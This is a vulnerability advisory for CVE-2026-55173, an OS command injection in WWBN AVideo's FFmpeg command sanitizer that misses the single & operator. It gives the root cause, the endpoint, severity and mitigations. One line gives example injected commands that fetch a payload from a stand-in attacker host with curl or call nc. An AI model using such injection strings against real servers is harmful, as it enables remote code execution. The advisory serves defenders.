Summary
CVE-2026-55173 is a high-severity OS command injection vulnerability affecting WWBN AVideo versions 29.0 and below, arising from an incomplete fix of CVE-2026-33482. The sanitizeFFmpegCommand() function in plugin/API/standAlone/functions.php fails to neutralize the bare & shell background operator, leaving the execAsync() sh -c execution sink exploitable. An unauthenticated remote attacker who can craft a valid encrypted payload can inject and execute arbitrary OS commands on the server, achieving full remote code execution (RCE). The vulnerability carries a CVSS v3.1 score of 8.1 (HIGH).
Technical details
- Root cause: The prior patch for CVE-2026-33482 added
$,(,),{,},n,rto the denylist insanitizeFFmpegCommand()and applied astr_replace('&&', '', ...)strip, but did not account for the single&character, which acts as a shell background/command-separator operator. - Trigger conditions: An attacker must deliver a crafted AES-256-CBC encrypted JSON payload — with a timestamp within 30 seconds — to the
ffmpeg.json.phpendpoint, where_decryptString(getInput('codeToExecEncrypted'))processes the input before it is passed to the vulnerable sink. - Attack vector: Network-accessible HTTP endpoint (
ffmpeg.json.phpon the standalone encoder server); no authentication or user interaction required. Attack complexity is rated High (AC:H) due to the requirement to craft a valid encrypted payload. - Impact: Arbitrary OS command execution at the privilege level of the web server process. Multiple commands can be chained using
&separators (e.g.,& curl http://attacker/payload,& nc ...). Redirect-based payloads (>) are blocked by an existing strip, but arbitrary command execution remains fully available.
Affected software
- WWBN AVideo — all versions 29.0 and below
Severity
- CVSS v3.1 Base Score: 8.1 (HIGH)
- Vector:
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Mitigation and recommended actions
- Patch: Apply the upstream fix from commit
c1cfa2bea8a351a1d07f5758f82887403e3abf1f, which adds&to the regex denylist insanitizeFFmpegCommand(). No formally tagged patched release version has been identified at the time of publication — monitor the official AVideo repository for a versioned release containing this fix. - Workaround: If immediate patching is not feasible, restrict network access to the
ffmpeg.json.phpstandalone encoder endpoint at the perimeter (firewall or WAF) to prevent unauthenticated external access.
IONIX Status
The IONIX research team is tracking ongoing exploitation attempts and recommends immediate patching. Potentially affected assets are outlined in this post.

